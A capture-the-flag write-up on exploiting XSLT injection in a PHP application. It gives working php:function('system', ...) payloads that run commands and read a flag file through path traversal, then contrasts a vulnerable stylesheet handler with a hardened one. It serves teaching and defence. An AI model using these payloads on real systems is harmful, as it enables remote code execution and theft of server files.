Exploit the XSLT Injection vulnerability to obtain RCE and read the flag.
To explore this XSLT vulnerability, let's first try a simple payload to see whether the command gets executed:
<xsl:value-of select="php:function('system','id')" />
And it worked!
After looking around with the ls command, we finally managed to get the flag with the following payload:
<xsl:value-of select="php:function('system','cat ../../../../flag.txt')" />
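The reason php:function() can reach system() is that the application exposes the PHP function bridge to a stylesheet the user controls. The following is an added example, not code from the challenge or the page, showing a hypothetical vulnerable handler next to a hardened one (the function and file names are assumptions):

```php
<?php
// Vulnerable pattern (hypothetical): the stylesheet comes from the request and
// registerPHPFunctions() with no argument exposes EVERY PHP function to it,
// so php:function('system', ...) inside the XSLT runs on the server.
function transformUnsafe(string $xml, string $userXslt): string
{
    $doc = new DOMDocument();
    $doc->loadXML($xml);
    $xsl = new DOMDocument();
    $xsl->loadXML($userXslt);          // attacker-controlled stylesheet
    $proc = new XSLTProcessor();
    $proc->registerPHPFunctions();     // no allowlist: full PHP surface
    $proc->importStylesheet($xsl);
    return $proc->transformToXml($doc);
}

// Hardened pattern (hypothetical): only a fixed, server-side stylesheet is
// ever imported, and the PHP function bridge is never enabled. Without
// registerPHPFunctions() a php:function() call is rejected at transform
// time instead of executing.
function transformSafe(string $xml): string
{
    $doc = new DOMDocument();
    $doc->loadXML($xml);
    $xsl = new DOMDocument();
    $xsl->load(__DIR__ . '/templates/report.xsl'); // trusted, not user input
    $proc = new XSLTProcessor();
    // If a bridge is truly required, restrict it to an explicit allowlist of
    // harmless pure functions instead of leaving it open:
    // $proc->registerPHPFunctions(['strtoupper', 'number_format']);
    $proc->importStylesheet($xsl);
    return $proc->transformToXml($doc);
}
```

Even with the allowlist, user input should only ever flow in as XML data to be transformed, never as the stylesheet itself.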